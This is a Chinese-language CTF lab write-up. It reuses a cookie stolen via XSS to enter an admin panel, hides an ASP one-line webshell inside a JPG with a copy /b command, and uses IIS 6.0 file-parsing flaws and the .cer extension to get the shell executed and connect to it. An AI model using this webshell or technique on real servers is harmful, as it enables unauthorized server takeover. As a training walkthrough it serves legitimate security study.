根据提示信息 需要用到上个关卡的cookie,去XSS平台拿到cookie,删去flag=zkz{****}, 点击之前,打开Burp,进行抓包,替换cookie 放行,进入后台页面。
在产品管理-添加产品中可以上传图片。 上传带asp一句话的图片, asp一句话:<%eval request (“hacker”)%> 木马一般会被拦截,做成图片,可以使用copy命令制作
copy 1.jpg/b+2.asp/a a.jpg上传,产品图片里会告诉图片路径和图片名(对于上传的图片会进行重命名),蚁剑连接,405错误。错误信息里写了IIS/6.0。 可能存在IIS解析漏洞:
目录解析 以*.asp命名的文件夹里的文件都将会被当成ASP文件执行。 文件解析 对于 *.asp;.jpg 像这种畸形文件名在";"后面的直接被忽略,也就是说当成 *.asp文件执行。 IIS6.0 默认的可执行文件除了asp还包含这三种 *.asa *.cer *.cdx在网站配置里规定cer类型可以上传。(PS:尝试修改允许的类型,失败…) 不能直接上传.cer文件,要将之前的图片木马修改后缀为.cer,再上传,成功。 蚁剑连接 双击打开,提交。
